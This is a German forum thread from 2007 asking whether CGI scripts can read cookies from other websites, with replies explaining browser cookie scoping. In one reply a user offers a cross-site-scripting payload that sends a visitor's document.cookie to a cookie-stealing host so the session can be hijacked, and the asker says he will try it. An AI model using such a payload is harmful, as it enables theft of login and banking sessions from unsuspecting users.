[CGI] Cookies anderer Seiten lesen?

Dieses Thema im Forum "Webentwicklung" wurde erstellt von Cydoc, 24. Februar 2007 .

Schlagworte:
  1. 24. Februar 2007
    Cookies anderer Seiten lesen?

    Hi, ist es möglich mithilfe von CGI Cookies anderer Seiten zu lesen?
    Damit man zum Beispiel Verbindungen zwischen seinen Projekten bauen kann, auch wenn Sie auf verschiedenen Servern liegen.
    Hoffe das geht.

    Bitte keine Antwort wie: "mach die projekte auf einen server" Danke^^

    MfG
     
  2. 24. Februar 2007
    AW: Cookies anderer Seiten lesen?

    Nein das geht nicht. Der Browser ueberprueft die URL von deiner Seite. Wenn fuer diese Cookies vorhanden sind, werden diese mit im Header gesendet. Sonst nicht.
     
  3. 24. Februar 2007
    AW: Cookies anderer Seiten lesen?

    ich formulier das 1. posting mal um, damit sichtbar wird, was dann fürn unfug mit solchen funktionen getrieben werden könnte. is kein persönlicher angriff

    ---
    Hi, ist es möglich mithilfe von CGI Cookies anderer Seiten zu lesen?
    Damit man zum Beispiel hier einen harmlos aussehenden Link posten kann, den ein User anklickt, und mein Skript dann den RR-Cookie mit Login-Informationen und vielleicht noch den Cookie des jeweiligen Online-Bankings auslesen kann.
    Hoffe das geht.
    ---

    hab vor kurzem genau das gleiche gefragt (nicht hier): ob es möglich ist, cookies einer fremden domaine auslesen zu können. kurzum: nein. und bei obigem beispiel merkt man, dass das auch so sein soll
    könnte allerdings abhilfen geben - je nach dem, was du unter "verbindung zwischen projekten" verstehst. an 1. stelle fallen mir da webservices ein; ob die das sind, was du brauchst, kann ich z.zt. nicht sagen. wollt's nur mal in den raum werfen und mit meinem wissen prollen
     
  4. 24. Februar 2007
    AW: Cookies anderer Seiten lesen?

    Mach n Link ála:

    <script>document.write("<a href='http://mein2.server.cookieklau.com/ich.klaue.php?"+document.cookie+"' target='_blank'>Klick mir. Ich bin ungefährlich.</a>");</script>

    Dann auslesen, neue Cookies setzen, und fertig.
     
  5. 24. Februar 2007
    AW: Cookies anderer Seiten lesen?

    Danke schonmal für die Antworten, das letzte werd ich mal testen...

    aber ich hab dashier zwischendurch gefunden:
    Matts Script Archive: HTTP Cookie Library

    Ist das nicht so etwas? Da kann man Pfad, Domain etc im Script angeben und dann davon Cookie lesen lassen? Oder versteh ich das Script falsch?

    MfG
     
  6. 25. Februar 2007
    AW: Cookies anderer Seiten lesen?

    Ich habs mir nicht angeguckt, aber ja.
    Cookies von fremden Seiten auslesen kannst du Telefonzelles XSS-Code (XSS = Cross Site Scripting).
     
  7. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.